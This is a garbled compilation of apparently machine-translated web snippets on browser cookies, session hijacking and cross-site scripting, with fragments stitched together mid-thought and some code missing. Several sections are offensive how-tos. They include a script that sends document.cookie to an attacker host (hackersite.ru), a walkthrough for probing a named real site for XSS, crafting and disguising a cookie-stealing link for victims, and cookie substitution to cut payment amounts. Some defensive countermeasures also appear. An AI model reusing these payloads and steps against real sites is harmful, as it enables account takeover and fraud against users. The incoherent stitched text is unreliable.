What is a cookie?
There is a mechanism that allows the http server to save some text information on the user's computer and then access it. This information is called a cookie. Essentially, each cookie is a pair: the name of a parameter and its value. Each cookie is also assigned the domain to which it belongs. For security reasons, in all browsers the http server is only allowed to access the cookie of its domain. Additionally, cookies may have an expiration date, in which case they will be stored on the computer until this date, even if you close all browser windows.
Why are cookies important?
All multi-user systems use cookies to identify the user. More precisely, the user’s current connection to the service, user session. If someone recognizes your cookies, they will be able to log into the system on your behalf. Because at the moment very few Internet resources check for IP address changes during one user session.
How to change or replace cookies?
Browser developers do not provide built-in tools for editing cookies. But you can get by with a regular notepad.
Step 1: create a text file with text
Windows Registry Editor Version 5.00
@="C:\\IE_ext.htm"
Save it under the name IE_ext.reg
Step 2: Using the created file, add changes to the Windows registry.
Step 3: create a text file with text
<
script
language
="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);
external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru" ;
alert(external.menuArguments.document.cookie);
Save it under the name C:\IE_ext.htm
Step 4: We go to the website we are interested in.
Step 5: Right-click on an empty space on the page and select the menu item "Working with Cookies". Allow access to the clipboard. Your cookies from this site will go to the clipboard. You can insert their notepad and take a look.
Step 6: To change some cookies, edit the file C:\IE_ext.htm, replacing testname in the name of cookie, testvalue- on its meaning, testdomain.ru– to the site domain. If necessary, add more similar lines. For ease of control, I added to the script the output of the current cookies before and after the change: alert(external.menuArguments.document.cookie);
Step 7: Perform Step 5 again, and then refresh the page.
Bottom line: we will access this Internet resource with updated cookies.
How to steal cookies using JavaScript?
If an attacker manages to find an opportunity to execute an arbitrary JavaScript script on the victim’s computer, then he can read the current cookies very easily. Example:
var str= document.cookie;
But will he be able to transfer them to his site, because, as I indicated earlier, a JavaScript script will not be able to access a site located on a different domain without additional confirmation? It turns out that a JavaScript script can load any image located on any http server. At the same time, transfer any text information in the download request to this picture. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:
var img=new Image();
img.src="http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);
then the cookie will end up in the request to download the “picture” and will “go” to the attacker.
How to handle such requests to download an “image”?
An attacker only needs to find a hosting with PHP support and place code like this there:
Then all request parameters for this script will be saved in the file log.txt. All that remains is to replace the previously described JavaScript script http://hackersite.ru/xss.jpg to the path to this php script.
Bottom line
I showed only the simplest way to exploit XSS vulnerabilities. But this proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.
A friend of mine forgot the password to one site. However, he had previously checked the “Remember me” checkbox in the Google Chrome browser when logging in, which allowed him to access the site under his account. I received a question whether it is possible to transfer this magical state to another computer. It would have been more correct, of course, to change or restore the password, but my friend could not do this for reasons unrelated to the case.
How to use intercepter-ng for dummiesDespite the variety of modern software to choose from, it is difficult to find better hacking programs for Android than intercepter ng. The first criterion indicating in favor of this product is its actual performance. Most of the sniffers offered on the network are just imitations that do not perform their stated functions.
The next positive factors are the versatility of the application and coverage of a wide audience of users.
Computer help 939-29-71Let's start in order. Cookies or "cookies" are very small text files - bookmarks with information.
The web server transmits this information to the user's browser. where this information is stored until required. Not quite clear. Well. Fine.
I'll try to make it even simpler. Look. you have registered on any website.
At the time of registration, these same “cookies” are created.
That's what they are.
Cookie CadgerThe program listens to traffic on the WiFi network, intercepts cookies and replicates the user's session in your browser, repeating requests with his credentials. Author Matthew Sullivan gave a presentation of the program on September 30 at the Derbycon hacker conference. Right during the speech, Matthew Sullivan intercepted an unsecured session with Google of one of the conference visitors via WiFi.
How to steal cookiesIf, while on a website page, you enter the following text into the address bar of your Firefox or Opera browser: javaсript:document.write(document.cookie); then you will see something like: remixAdminsBar=0; remixGroupType=0; remixpass=******************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Attention! .
The Complete Guide to Cross-Site ScriptingXSS is a type of software vulnerability native to Web applications that allows an attacker to inject client-side script into Web pages viewed by other users. Wikipedia defines XSS as follows: “Cross-site scripting (XSS) is a type of software vulnerability native to the Web. -applications (by bypassing browser security restrictions)”, which allows an attacker to inject client script into web pages viewed by other users.
Difference between cookies and sessionsNot long ago I wrote an article about how to register and authorize users on a website.
". In this article I'm going to break down the difference between sessions and cookies. so that you can finally make your choice.
Cookies. No, it's not about cookies at all, it's about your safety. So you go to your favorite site “vkontakte” (or, for example, look at mail) on someone else’s computer, refuse the “save password” option, happily look through the mail and leave. And don’t think about the fact that you can now log into a social network or email under your name.
I'm not even considering the situation with a program that remembers the password without your knowledge. This is already a deliberate hack, and you will probably suspect that something like this could happen and you will not go to your favorite site on such a computer. But we can talk about simple human curiosity - you were visiting friends, and then suddenly they get the opportunity to read your mail. Are you sure they will refuse this opportunity? Aren't you afraid that something will come out? In any case, I will put aside questions of morality and just talk about how information is stored on the computer that you can now be allowed into some site without asking for a password.
how to steal CookieAnd the name of this technology is cookies.
And this is where it all started. The http protocol, through which you actually view sites (including this one), did not initially provide for the possibility of maintaining a connection. That is, roughly speaking, you send a request to the site, receive a response, it is displayed on the screen, and then the server does not remember anything about you. This, of course, is good when the site is purely informational and should not remember anything about you, but we live in the age of Web 2.0 😉 The natural development of the protocol is POST and GET requests, when you send some data, the server can write it to the database data, but this is not enough.
Let's look at a very simple example. Forum. So you registered, and there is a post on the forum that there is such and such a user with such and such a password and some other additional data. But now you go to the forum and log in - enter your password. Somewhere there should be information that you are logged in. On server? Of course not! It is impossible to store information on the server that the authorization was made from your computer - it will not be able to distinguish you from someone else (even your IP address does not uniquely identify you)! Thus, information that authorization has occurred must be stored on your computer. That's what cookies are for, that's what they were created for.
A cookie is a small record on your computer that stores information about the site you have visited. When you log in, a similar entry is created, after which you can walk around the forum, and it will recognize you. However, this will already happen automatically - thanks to the information stored in the cookie - so pretending that you are the main administrator of the forum will still not work bypassing the password check.
Now we can return to where this article began. If you logged in somewhere without even saving a password, it may happen that an entry was created on the computer that now allows you to log into this resource under your name without authorization. Such an entry itself will become outdated after some time, but you can force it to be cleared. Each browser does this differently, I will show you how this can be done in my favorite Google Chrome. Opening the parameters
Go to the “advanced” tab and find the “show cookies” button
Now, of course, you can delete all cookies, but this may upset the computer owner. Therefore, for example, in the top field you can enter the name of the site you are interested in
Then you can clear only the cookies related to this site. You can try it on mine. However, if you log in to my forum and then clear your cookies, the login information will be forgotten. Try it!
comments powered by
1.What is XSS?
An XSS vulnerability allows arbitrary javascript code to be inserted into the body of a page. The XSS attack differs from others (for example, SQL injection or PHP injection) in that it affects the client, not the server.
With its help you cannot view database tables, load a shell, etc. The most common use of XSS is to steal cookies.
Cookies are a small piece of data created by a web server and stored on the user's computer as a file. Typically, cookies are used to store accounts, and, most often, they contain an encrypted password, login, and session ID (although not always)
XSS comes in two types, active and passive.
Passive XSS requires direct interaction from the victim, such as clicking on a link containing javascript code. When using this type of XSS, you cannot do without SI (Social Engineering)
Active XSS does not require any participation from the victim; all they need to do is visit the page containing the XSS. Active XSS can be, for example, in messages on forums, chats, adding news, etc.
2.Search for XSS
In this paragraph I will tell you how to find xss
2.1.Passive XSS
To find passive XSS, just substitute alert('xss') into the input form, if the script worked and the message "xss" appears, then the vulnerability is present, if the script did not work, you can also try ">alert(), this is probably the most common xss vulnerability. If neither one nor the other script worked, then most likely there is no vulnerability.
Let's look at an example.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Do you see the "search" form? insert ">alert()" there and click "find"
A window with xss appears, which means xss is present. (Perhaps by the time you read this article, this xss will have already been removed)
2.2.Active XSS
Such css can be, for example, in profile fields, when adding news in the title of the news and in the news itself (less often), in messages on forums/chat rooms/guest rooms with html enabled. Everything is simple here, we enter the script from the previous subparagraph into the fields, and if the message is displayed on the screen, then the vulnerability is present.
Let's look at xss in BB tags on the forums.
You can try to simply insert javascript code into the tag, for example like this:
javascript:alert('xss')
Some tags have parameters, for example a tag has dynsrc and lowsrc parameters, let's try to substitute the code like this:
http://www.site.ru/image.jpg dynsrc=javascript:alert(‘xss’)
If the script worked, xss is there
3.Using XSS to Steal Cookies
Now the most delicious))))
In order to steal cookies, we need a web sniffer, you can install some kind of sniffer on your hosting, or you can use an online sniffer, of which there are plenty now.
To steal cookies via passive XSS, the victim must follow a poisonous link. To steal cookies, we will use another script instead of alert('xss'):
img = new Image();
we substitute the script into the link and let the victim follow it, look at the sniffer log and rejoice.
Let's look at an example.
Let's take that XSS on Rambler from the previous paragraph.
We insert
">
img = new Image();
img.src = "sniffer image address"+document.cookie;
in the search form, click “find”, look at the address bar and see:
http://miss.rambler.ru/srch/?sort=0& … &words =">
We send this link to the victim and enjoy the cookies.
Seeing such a link, the victim may suspect something, so it is advisable to encode
">img = new Image();img.src = "sniffer image address"+document.cookie;
in URL Or use services like http://tinyurl.com/
Let's move on to active XSS, everything is simple here, instead of alert() we insert img = new Image();img.src = "address of the sniffer image"+document.cookie;
Now we have cookies. But what to do with them? It's simple, you need to substitute them instead of your own. The Opera browser has a built-in cookie editor (tools->advanced->cookie management), there is a plugin for Firefox (I don’t remember what it’s called, use Google)
That's all for now, perhaps the article will be supplemented
The picture shows that the cookie contains the line wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. This value is in unencrypted form in the cookie and can be easily intercepted using the Achilles utility, but in most cases in Achilles you can only see the hash of a particular entry. Before sending the request to the server, you can try to replace this line with any similar one (although in this case there is no point) - the number of attempts is not limited. Then, by sending this request to the server using the Send button, you can receive a response from the server intended for the administrator.
In the previous example, you can use direct user ID spoofing. In addition, the name of the parameter, whose value substitution provides additional opportunities for the hacker, can be the following: user (for example, USER=JDOE), any expression with an ID string (for example, USER=JDOE or SESSIONID=BLAHBLAH), admin (for example, ADMIN= TRUE), session (for example, SESSION=ACTIVE), cart (for example, CART=FULL), as well as expressions such as TRUE, FALSE, ACTIVE, INACTIVE. Typically, the format of cookies is very dependent on the application for which they are used. However, these tips for finding application flaws using cookies apply to almost all formats.
Client-side countermeasures against cookie extractionIn general, users should be wary of Web sites that use cookies for authentication and to store sensitive data. It is also necessary to remember that a Web site that uses cookies for authentication must support at least the SSL protocol to encrypt the username and password, since in the absence of this protocol, the data is transmitted unencrypted, which makes it possible to intercept it using simple software tools to view data being sent over the network.
Kookaburra Software has developed a tool to facilitate the use of cookies. The tool is called CookiePal (http://www.kburra.com/cpal.html (see www.kburra.com)). This program is designed to alert the user when a Web site tries to install a cookie on the machine, and the user can allow or deny this action. Similar cookie blocking functions are available in all browsers today.
Another reason for regularly installing Web browser updates is that security flaws in these programs are constantly being identified. So, Bennet Haselton and Jamie McCarthy created a script that, after clicking on a link, retrieves cookies from the client's machine. As a result, all the contents of the cookies that are on the user's machine become available.
This type of hack can also be accomplished by using a handle embedded in the HTML text of a Web page (or in the HTML content of an email or newsgroup posting) to steal cookies. Consider the following example:
To ensure that such things do not threaten our personal data, I do this myself and advise everyone to always update software that works with HTML code (e-mail clients, media players, browsers, etc.).
Many people prefer to simply block cookies, but most Web sites require cookies to be browsed. Conclusion - if in the near future an innovative technology appears that allows you to do without cookies, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for a hacker! This is true, since a better alternative does not yet exist.
Server-side countermeasuresIn case of recommendations for ensuring server security, experts give one simple piece of advice: do not use the cookie mechanism unless absolutely necessary! Particular care must be taken when using cookies that remain on the user's system after the end of the communication session.
Of course, it is important to understand that cookies can be used to provide security to Web servers for user authentication. If your application does need to use cookies, you should configure the cookie mechanism to use different short-lived keys for each session, and try not to put information in these files that could be used by hackers for hacking (such as ADMIN=TRUE).
Additionally, to make your use of cookies more secure, you can use cookie encryption to prevent sensitive information from being extracted. Of course, encryption does not solve all security problems when working with cookie technology, but this method will prevent the most basic hacks described above.
Cookies- information in the form of a text file saved on the user’s computer by the website. Contains authentication data (login/password, ID, phone number, mailbox address), user settings, access status. Stored in the browser profile.
Cookie hacking is the theft (or “hijacking”) of a web resource visitor’s session. Private information becomes available not only to the sender and recipient, but also to a third party - the person who carried out the interception.
Cookie Hacking Tools and TechniquesComputer thieves, like their colleagues in real life, in addition to skills, dexterity and knowledge, of course, also have their own tools - a kind of arsenal of master keys and probes. Let's take a look at the most popular tricks hackers use to extract cookies from Internet users.
SniffersSpecial programs for monitoring and analyzing network traffic. Their name comes from the English verb “sniff” (sniff), because. literally “sniff out” transmitted packets between nodes.
But attackers use a sniffer to intercept session data, messages and other confidential information. The targets of their attacks are mainly unprotected networks, where cookies are sent in an open HTTP session, that is, they are practically not encrypted. (Public Wi-Fi is the most vulnerable in this regard.)
To embed a sniffer into the Internet channel between the user node and the web server, the following methods are used:
- “listening” to network interfaces (hubs, switches);
- branching and copying traffic;
- connecting to a network channel gap;
- analysis through special attacks that redirect the victim’s traffic to the sniffer (MAC-spoofing, IP-spoofing).
The abbreviation XSS stands for Cross Site Scripting. Used to attack websites in order to steal user data.
The principle of XSS is as follows:
- an attacker inserts malicious code (a special disguised script) into a web page of a website, forum, or into a message (for example, when corresponding on a social network);
- the victim goes to the infected page and activates the installed code on his PC (clicks, follows a link, etc.);
- in turn, the executed malicious code “extracts” the user’s confidential data from the browser (in particular, cookies) and sends it to the attacker’s web server.
In order to “implant” a software XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.
All XSS vulnerabilities are divided into two types:
- Passive. The attack is obtained by requesting a specific script on a web page. Malicious code can be injected into various forms on a web page (for example, into a site's search bar). The most susceptible to passive XSS are resources that do not filter HTML tags when data arrives;
- Active. Located directly on the server. And they are activated in the victim’s browser. They are actively used by scammers in all kinds of blogs, chats and news feeds.
Hackers carefully “camouflage” their XSS scripts so that the victim does not suspect anything. They change the file extension, pass off the code as an image, motivate them to follow the link, and attract them with interesting content. As a result: a PC user, unable to control his own curiosity, with his own hand (with a mouse click) sends session cookies (with login and password!) to the author of the XSS script - the computer villain.
Cookie substitutionAll cookies are saved and sent to the web server (from which they “came”) without any changes - in their original form - with the same values, strings and other data. Deliberate modification of their parameters is called cookie substitution. In other words, when replacing cookies, the attacker pretends to be wishful thinking. For example, when making a payment in an online store, the cookie changes the payment amount downwards - thus, “saving” on purchases occurs.
Stolen session cookies on a social network from someone else’s account are “inserted” into another session and on another PC. The owner of the stolen cookies gets full access to the victim's account (correspondence, content, page settings) as long as she is on her page.
“Editing” cookies is carried out using:
- “Manage cookies...” functions in the Opera browser;
- Cookies Manager and Advanced Cookie Manager addons for FireFox;
- IECookiesView utilities (Internet Explorer only);
- a text editor such as AkelPad, NotePad or Windows Notepad.
A very simple implementation scheme, consisting of several steps. But it is effective only if the victim’s computer with an open session, for example VKontakte, is left unattended (and for a long time!):
As a rule, hackers use the above tools (+ others) both in combination (since the level of protection on many web resources is quite high) and separately (when users are excessively naive).
XSS + snifferAnd most importantly, do not lose vigilance and attention while relaxing or working on the Internet!